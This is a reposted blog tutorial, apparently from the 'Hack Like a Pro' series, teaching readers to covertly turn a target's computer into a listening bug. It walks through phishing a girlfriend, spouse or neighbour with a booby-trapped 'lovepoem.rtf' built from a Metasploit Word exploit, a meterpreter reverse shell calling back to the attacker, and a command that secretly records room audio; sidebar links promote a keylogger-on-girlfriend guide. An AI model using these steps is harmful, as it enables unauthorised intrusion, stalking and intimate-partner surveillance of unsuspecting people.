Hack Like a Pro: How to Hack a Computer & Spy on Anyone, Part 1

AI权益加码!Claude Code、Cursor等20+工具免费用! 购周边限时加赠Coding Plan Lite,畅享主流AI工具!学习进阶更高效! 阅读详情

http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-computer-spy-anyone-part-1-0156376/

网上看到的一篇有意思的黑客文章。

Welcome back, my rookie hackers!

Now that nearly everyone and everyplace has a computer, you can use those remote computers for some good old "cloak and dagger" spying. No longer is spying something that only the CIA, NSA, KGB, and other intelligence agencies can do—you can learn to spy, too.

In this brand new series, we will explore how we can use the ubiquity of the computer to peek in on just about anyone and anyplace. Unlike the spy movies of yesteryear where the spy had to place a listening device in the lamp or in a houseplant, as long as there is a computer in the room, it can be used as a "bug."

We will examine how to turn that commonplace computer into our own bug to listen in on conversations, use as a spy camera, track Internet searches, and more. James Bond and Q have nothing on us!

In this first part, I will show you how to convert any computer, anywhere, into a listening device. As nearly every room now has a computer in it, you can put a bug in nearly every room, unnoticed and undetected.

Step 1: Fire Up Kali

The first step, of course, is to fire up Kali Linux. To be able to use any computer as a bug, the first step will be to compromise the target computer.

Step 2: Compromise the Remote Computer

Probably the best way to compromise your target's computer is to use a carefully crafted email that will get the target to click on a document or link. Inside that document or link, we will embed a rootkit/listener that will enable us to turn on the built-in microphone on their computer and save any conversations in the room where it is located.

Since we know the victim (it may be a girlfriend, neighbor, spouse, business associate, foreign diplomat, foreign spy, etc.), we can can be very specific in crafting an email that would gain their acceptance. The key, of course, is to create document that sounds compelling, or at least interesting, to get the victim to click on the Word document.

This becomes an exercise in social engineering at this point. If the victim is a girlfriend/boyfriend, you might try sending a love letter. If the victim is a business associate, it might be Word or Excel document with a sales or other report. If it is a neighbor, it may be a link to a community webpage.

I hope you get the point. Be creative and imaginative and send something that the person will be compelled to open and view.

Step 3: Find an Exploit

Now, if we want to exploit a Windows 7 system (most Windows 7 exploits will work on Windows 8), we will need to find a Windows 7 exploit that utilizes vulnerabilities in Microsoft's Word application.

This past spring, Microsoft revealed that hackers had found a vulnerability in Microsoft Word and Office Web apps that could allow remote code execution (read, rootkit). Here is Microsoft's announcement on their Technet Security Bulletinbelow (more info on Technet can be found here).

As you can see, they have named it MS14-017. When we do a search inMetasploit for this vulnerability/exploit, we find:

exploit/windows/fileformat/ms14_017_rtf

Now that we have found the proper exploit, let's load it into Metasploit by typing:

msf >use exploit/windows/fileformat/ms14_017_rtf

Once we have it loaded, let's type "info" to find more about this exploit.

Now, "show options."

As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works only on Office 2010.

Step 4: Set the FILENAME

In this example, we will be spying on your girlfriend, so let's send her a love poem. Let's set the FILENAME to "lovepoem.rtf."

set FILENAME lovepoem.rtf

Step 5: Set the Payload

Next, we need to set the payload to place in her "lovepoem." In this case, let's send the meterpreter as it gives us almost unlimited power and control over the hacked system.

msf > set PAYLOAD windows/meterpreter/reverse_tcp

Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is executed by the victim.

Finally, simply type "exploit." This will create a Word file called "lovepoem" that will place the meterpreter on her system that we can then connect to.

Step 6: Open a Multi-Handler for the Connection

For the next step, we need to open a multi-handler to receive the connection back to our system.

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp

And finally, set the LHOST to your IP.

Step 7: Send the Love Poem to Your Girfriend

Now that we have created our malicious file, you need to send it to your girlfriend. You likely will want to send it via an email attachment with a note telling her that your wrote her a short poem to express your love for her. Knowing that it is from you, I'm sure she will click on it as she loves you dearly and trusts you completely.

Step 8: Compromise Her System

When she opens it, we will have a meterpreter session on her computer like that below. Now comes the good part.

Step 9: Record with the Microphone

What we will do next is enable the microphone on her computer and begin to record all of the sounds within earshot of it. Metasploit has a Ruby script that will enable the microphone on the target machine and begin to record all sounds and conversations nearby. If we go to our ultimate list of meterpreter scripts, we can find it among the many ready Ruby scripts built for the meterpreter.

From the meterpreter prompt, simply type:

meterpreter > run sound_recorder - l /root

This will start the microphone on her computer and store the recorded conversations and sounds in a file in the /root directory on your system. Of course, you can choose any directory to store these recordings. Just make certain you have adequate hard drive space, as these files can become very large. When you want to hear what was recorded, simply open the stored file on your system.

Stay Tuned for More Spying Fun...

No longer is spying the exclusive province of the CIA, NSA, KGB, or MI5. With just a little computer skills, anyone can be a spy. In future tutorials, I will show you how to turn on webcamstake screenshots, download confidential files from anyone's computer, and more.



How to Hack Like a Pornstar_2017.pdf.zip How to Hack Like a Pornstar,一本17年流传于国外论坛的介绍渗透测试的书籍,不要被书名迷惑 立即下载

相关推荐

纬地、鸿业、海地、CASS等横断面数据互转工具V3.2

本工具是一款专门针对道路工程横断面数据格式转换的桌面应用程序,支持RTK/全站仪散点数据直接生成纬地HDM文件、CASS数据与纬地/鸿业/海地格式互转、多种横断面格式相互转换等核心功能。

Burpsuite 指纹特征绕过

需要高版本 17 + 的 burp 运行插件,可 bypass 网站流量设备的检测,正常抓包。未使用插件前,burp 指纹特征被识别,抓包被拦截。

Javachichi的博客 6573

2026年最新迁安市公交线路及站点矢量数据.zip

数据格式:shp 数据坐标:GCJ02 数据更新时间:2026年9月 公交线路来源:8684网站 https://8684.com.cn/ 站点数据来源:高德API接口 数据打开方式:QGIS或Arcgis 站点数据字段:名称、序号、对应线路、几何信息 线路数据字段:名称、类型、起点、终点、开始时间、结束时间、起步价、全价、长度、公司、几何信息

2025版最新WEB安全入门指南,零基础入门到精通,收藏这篇就够了

模拟真实攻击者的行为,对目标系统进行渗透测试,以评估系统的安全性。

wly55690的博客 971

不错的地址。收藏。Hack like pro系列

http://creator.wonderhowto.com/occupythewebotw/

MyDriverC 1051

how to hack

                           ==Phrack Inc.==               Volume 0x0b, Issue 0x3f, Phile #0x0c of 0x0f|=---------------------------=[ How to Hack ]=--------------------------=||=-----------------------

xnix相关的收藏 3万+

Top 5 Websites To Learn How To Hack Like A Pro

Whether you’re a college student, a middle-aged networking guru or a wife and mother fascinated by the world of online games – everyone occasionally comes across a situation where some form of ha...

dianhua2199的博客 501

Hack Like a Pro: How to Remotely Install a Keylogger onto Your Girlfriend's Computer

http://null-byte.wonderhowto.com/how-to/hack-like-pro-remotely-install-keylogger-onto-your-girlfriends-computer-0141971/ Welcome back, my greenhorn hackers! Several of you have you have emaile

MyDriverC 875

计算机系统要素-从零开始构建现代计算机--第五章,01-HACK硬件平台规范

从零开始构建现代计算机--第五章,01-HACK硬件平台规范概述执行(Execute)取指令(Fetch)构建使用的元件中央处理器(Central Processing Unit,CPU)A-指令(The A-Instruction)C-指令(The C-Instruction)Computation规范(计算规范)Destination规范(目的地规范)Jump规范(跳转规范)使用A寄存器的冲突符号预定义符号(Predefined symbols)标签符号(Label symbols)变量符号(Varia

qq_17065591的博客 925

详解link

详解link有些人写C/C++(以下假定为C++)程序,对unresolved external link或者duplicatedexternalsimbol的错误信息不知所措(因为这样的错误信息不能定位到某一行)。或者对语言的一些部分不知道为什么要(或者不要)这样那样设计。了解本文之后,或许会有一些答案。    首先看看我们是如何写一个程序的。如果你在使用某种IDE(Visual S

likefrank的专栏 802

黑客如何通过使用你的ip地址和端口号来入侵你的电脑,我们又该如何防范

How Hackers Use Your IP Address to Hack Computer remotely & How to Stop It Here you will see How Hackers Use Your IP Address to Hack Your Computer  & How to Stop It .IP address is

albertjone的博客 2万+

《指弹:Like a star》

yexiangCSDN的专栏 4741

like a star

又是平凡的一周又过去了,感觉马上要开学了。 这周,关于学习方面也是没有太多进展,ye

行大于言 211

MCP 服务器可将您的代码库索引为持久化知识图谱

MCP 服务器可将您的代码库索引为持久化知识图谱。支持 64 种语言,查询响应时间低于毫秒级,相比 grep 减少 99% 的令牌使用量。仅需单个 Go 二进制文件,无需 Docker,无需 API 密钥。

【SCI一区复现】基于配电网韧性提升的应急移动电源预配置和动态调度(下)-MPS动态调度(Matlab代码实现)

内容概要:本文围绕搜索引擎营销(SEM)广告投放策略优化问题,构建了一个从诊断、分类、优化到鲁棒决策的完整建模框架。基于某互联网公司2025年全年约142万元的投放数据,文章首先从广告设计、关键词管理、出价与预算、投放时间四个维度系统分析了投放策略的合理性,并揭示了工作日与节假日之间显著的效益波动规律,特别是春节断崖式下跌、国庆与双十一冲高的假日效应。随后提出基于成本—效益二维归一化的分类方法,结合中位数分割与K-means聚类校验,将6000余个关键词科学划分为黄金词、重点词、潜力词、问题词和无效词五类。在此基础上建立了以注册量最大化为目标、受日预算与总预算双重约束的0-1整数规划模型,并设计贪心选词与拉格朗日对偶定价相结合的两阶段高效求解算法,实现了关键词优选与精细化出价。最后引入条件风险价值(CVaR)鲁棒优化框架,通过情景生成与动态参数更新,有效应对竞价、点击、转化等多重不确定性,提升了策略在极端市场环境下的稳定性与抗风险能力。实证结果表明,优化后单位注册成本下降约20%,预算结构更趋合理,展位质量和投放稳健性显著提升。; 适合人群:具备数据分析与运筹优化基础,从事数字营销、广告算法、商业智能等相关工作的研究人员或从业者,以及参与数学建模竞赛的学生。; 使用场景及目标:①用于企业SEM广告投放策略的诊断与优化,提升广告投放的投资回报率(ROI);②为关键词价值评估、预算分配、出价决策等关键环节提供可解释、可操作的量化模型支持;③在高度不确定的竞争环境中实现风险可控的鲁棒化广告投放决策,适用于电商、互联网产品推广、在线教育等多种数字营销场景。; 阅读建议:本文兼具理论深度与实践价值,建议读者结合文中提供的代码与数据复现模型全流程,重点关注关键词分类的逻辑设计、两阶段求解算法的经济含义及其计算效率优势,以及CVaR在处理多重不确定性中的建模技巧,从而深入掌握从实际问题分析到数学模型构建再到策略落地实施的完整方法论链条。

2026年最新莱芜市公交线路及站点矢量数据.zip

数据格式:shp 数据坐标:GCJ02 数据更新时间:2026年9月 公交线路来源:8684网站 https://8684.com.cn/ 站点数据来源:高德API接口 数据打开方式:QGIS或Arcgis 站点数据字段:名称、序号、对应线路、几何信息 线路数据字段:名称、类型、起点、终点、开始时间、结束时间、起步价、全价、长度、公司、几何信息

PCDViewer-5.5.0-Ubuntu22.04-20260912.tar.gz

一款轻量而功能强大的点云可视化和编辑软件,支持pcd, ply, las等多种格式,轻松打开海量点云数据,支持多方式多字段渲染点云,对点进行方便的查询、量测和编辑,提供了地面滤波算法,可应用于测绘、高精地图、SLAM等领域。 PCDViewer是一款专业的点云数据处理软件,特别适用于处理和编辑大规模点云数据。该软件支持多种点云文件格式,包括pcd、ply和las等,这些格式广泛应用于激光雷达扫描数据、三维建模以及其他测绘技术。PCDViewer的强大之处在于其轻量级的系统要求与丰富的功能集,使得用户可以在Windows、Ubuntu等操作系统上轻松运行软件,高效地处理海量点云数据。 这款软件的一个主要特点是其多方式多字段渲染点云的能力。这允许用户根据不同的属性,如颜色、强度、高度等,对点云进行视觉上的分类和区分,从而更直观地分析和理解点云数据。此外,PCDViewer还提供了方便的查询、量测和编辑功能,允许用户直接对点云数据进行操作,诸如添加注释、删除噪声点或进行精确测量等,极大地提高了工作效率。 软件还内置了地面滤波算法,这一功能对于测绘学、地理信息系统(GIS)以及机器人导航和定位(SLAM)等领域尤为关键。地面滤波算法能够从点云数据中分离出地面点和非地面点,这对于如道路建模、地形分析、植被测量等应用来说至关重要。通过分离地面点,可以更准确地进行地面建模和地形特征分析,为自动化系统提供清晰的环境地图。

CAD+ËÃÊÐÐÍ¿»µÉ¼

CAD+ËÃÊÐÐÍ¿»µÉ¼

上一篇: 密码字典
下一篇: Kali Linux
mydriverc2
博客等级 码龄15年 355粉丝 52原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值